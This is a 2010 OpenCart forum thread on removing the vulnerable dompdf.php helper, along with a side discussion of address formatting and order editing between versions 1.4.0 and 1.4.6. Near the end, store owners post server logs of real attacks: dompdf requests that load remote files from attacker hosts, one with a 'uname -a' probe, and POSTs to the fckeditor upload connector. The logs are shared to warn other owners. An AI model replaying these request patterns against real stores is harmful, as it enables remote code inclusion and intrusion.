Yeah, but you obviously didn't understand it.Qphoria wrote:You wrote it, I read it
Modules for OpenCart 2.3.0.2
Homepage Module [Free - since OpenCart 0.7.7]
Multistore Extensions
Store Manager Multi-Vendor/Multi-Store management tool
If you're not living on the edge ... you're taking up too much space!
fido-x wrote:In OpenCart, this just means deleting "system/helper/dompdf/dompdf.php". Since my own contributions in this area (PDF viewer for OC versions 1.3.2 and 1.3.4) already use the class directly, they will continue to work with the "dompdf.php" file removed.
Guys!Qphoria wrote:Just delete the damn folder
You are not talking about the same thing so that is where the confusion starts!
The folder needs to be there, only the "dompdf.php" file needs te be removed.
Norman in 't Veldt
Moderator OpenCart Forums
_________________ READ and Search BEFORE POSTING _________________
Our FREE search: Find your answer FAST!.
[How to] BTW + Verzend + betaal setup.
I went to the dompdf site and it looks like nobody has any conversations about it.
http://www.digitaljunkies.ca/dompdf/
http://code.google.com/p/dompdf/issues/list
Actually in google when I search "dompdf vulnerability" I find only articles from Feb 2009 and there was a one line fix for it
I see there is dompdf 6.0 beta out but not sure how useful that is at this point
I copied my database, and upgraded from 1.4.0 to 1.4.6,
but then downgraded back to 1.4.0 for a few big reasons...
1) I can no longer copy addresses into Endicia's shipping program for quick and easy shipping (main reason)
This is the biggest reason I had to downgrade, It would increase my shipping time by at least 10x everyday. One copy and paste for every order is much much better than 9 copy and paste actions for every order. When shipping a lot of orders this ready starts to slow you down big time.
2) Cannot edit invoices to make changes on errored ordered, such has price changes.
3) Cannot change or void an invoice and have the cost deduct from the sales statistics.
for a single store user I don't see any benefit in the 1.4.6 upgrade
I may actually spend some time writing these features into version 1.4.0, since everything else on that version is excellent.
...Address format is no longer shipping friendly ...
Joe Smith
200 Cherry Lane
New York, NY, 13110
...it's now a line by line thing, no longer compatible with any copy/paste shipping programs....
First Name: Joe
Last Name: Smith
Company:
Address 1: 200 Cherry Lane
City: New York
Post Code: 13110
Region / State: New York
Region / State Code: NY
Country: United States
This you can set yourself in the BO of 1.4.6:12oclocker wrote: ...Address format is no longer shipping friendly ...
Joe Smith
200 Cherry Lane
New York, NY, 13110
...it's now a line by line thing, no longer compatible with any copy/paste shipping programs....
First Name: Joe
Last Name: Smith
Company:
Address 1: 200 Cherry Lane
City: New York
Post Code: 13110
Region / State: New York
Region / State Code: NY
Country: United States
Configuration -> Settings -> Country's -> Country
Norman in 't Veldt
Moderator OpenCart Forums
_________________ READ and Search BEFORE POSTING _________________
Our FREE search: Find your answer FAST!.
[How to] BTW + Verzend + betaal setup.
I agree with 12oclocker that the 1.4.0 way of addressing is much better than the 1.4.6 way.12oclocker wrote:...Address format is no longer shipping friendly ...
Joe Smith
200 Cherry Lane
New York, NY, 13110
...it's now a line by line thing, no longer compatible with any copy/paste shipping programs....
First Name: Joe
Last Name: Smith
Company:
Address 1: 200 Cherry Lane
City: New York
Post Code: 13110
Region / State: New York
Region / State Code: NY
Country: United States
I believe they where the same...Johnathan wrote:I agree with 12oclocker that the 1.4.0 way of addressing is much better than the 1.4.6 way.
Norman in 't Veldt
Moderator OpenCart Forums
_________________ READ and Search BEFORE POSTING _________________
Our FREE search: Find your answer FAST!.
[How to] BTW + Verzend + betaal setup.
I know where you are coming from for this. I used to use my own script that would send to usps by just copying the whole address. You should still be able to copy/paste the old way if you click the "Invoice" button at the top of the order page. Have you tried that?12oclocker wrote: 1) I can no longer copy addresses into Endicia's shipping program for quick and easy shipping (main reason)
This is the biggest reason I had to downgrade, It would increase my shipping time by at least 10x everyday. One copy and paste for every order is much much better than 9 copy and paste actions for every order. When shipping a lot of orders this ready starts to slow you down big time.
Ah, good idea. I've tested it, that works fine.Qphoria wrote:I know where you are coming from for this. I used to use my own script that would send to usps by just copying the whole address. You should still be able to copy/paste the old way if you click the "Invoice" button at the top of the order page. Have you tried that?
That's a solution, I'll probably stick with 1.4.0 for now, the big feature I was hoping for was the ability to edit orders, order editing capability is a critical must for any real business, I was hoping 1.4.6 was going to have it, I am going to write some though, so once I write it I'll post it up, That a huge priority for me right now, I just don't have any time to do it at the moment, I definitely need a way to edit and void orders so that it reflects correctly on the statistics, very important for end of year tax time, if I don't have accurate records I'll get nailed, and I really don't want to keep paper records, so the statistic thing is a cool feature, I just need to code a way to make it accurate, because as it stands, I cannot alter an order in the system once it's placed, and I get at least 1 altered order per week, so this becomes a problem, I wish there was 32 hours in a day. I could get a lot more done. All in all though OpenCart is better than everything else I have tried, very cool, It will be a total solution once order editing is introduced.I know where you are coming from for this. I used to use my own script that would send to usps by just copying the whole address. You should still be able to copy/paste the old way if you click the "Invoice" button at the top of the order page. Have you tried that?
I did get his with the dompdf library vulnerability today!! it is real, I fixed it though. everything is ok now.
Code: Select all
[23-Mar-2010 03:05:17] PHP Warning: file_get_contents(http://66.181.240.100/~ches/go/195753.txt?x=uname -a) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found
in /home/user/public_html/store/system/helper/dompdf/include/dompdf.cls.php on line 261
[23-Mar-2010 03:06:08] PHP Fatal error: Uncaught exception 'DOMPDF_Exception' with message 'Requested HTML document contains no data.' in /home/user/public_html/store/system/helper/dompdf/include/frame_tree.cls.php:135
Stack trace:
#0 /home/user/public_html/store/system/helper/dompdf/include/dompdf.cls.php(293): Frame_Tree->build_tree()
#1 /home/user/public_html/store/system/helper/dompdf/include/dompdf.cls.php(377): DOMPDF->_process_html()
#2 /home/user/public_html/store/system/helper/dompdf/dompdf.php(275): DOMPDF->render()
#3 {main}
thrown in /home/user/public_html/store/system/helper/dompdf/include/frame_tree.cls.php on line 135
So for admins: make sure dompdf folder is deleted, but DO NOT delete system/helper/image.php
Also: Did you guys have a problems with fckeditor:
Code: Select all
94.228.220.68 - - [11/Apr/2010:12:13:15 +0300] "GET /store/system/helper/dompdf/dompdf.php?input_file=http://musorka.cn.zp.ua/cfg/conf.txt HTTP/1.1" 200 33 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51"
94.228.220.68 - - [11/Apr/2010:12:13:13+0300] "POST /store/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 276 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51"
if someone wants to study the IP ... here is my log ...
94.228.220.68 - - [11/Apr/2010:12:40:53 +0200] "POST /admin/view/javascript/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 200 309 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51"
94.228.220.68 - - [11/Apr/2010:12:40:55 +0200] "GET /system/helper/dompdf/dompdf.php?input_file=http://musorka.cn.zp.ua/cfg/conf.txt HTTP/1.1" 200 33 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51"
Daniele
Users browsing this forum: No registered users and 159 guests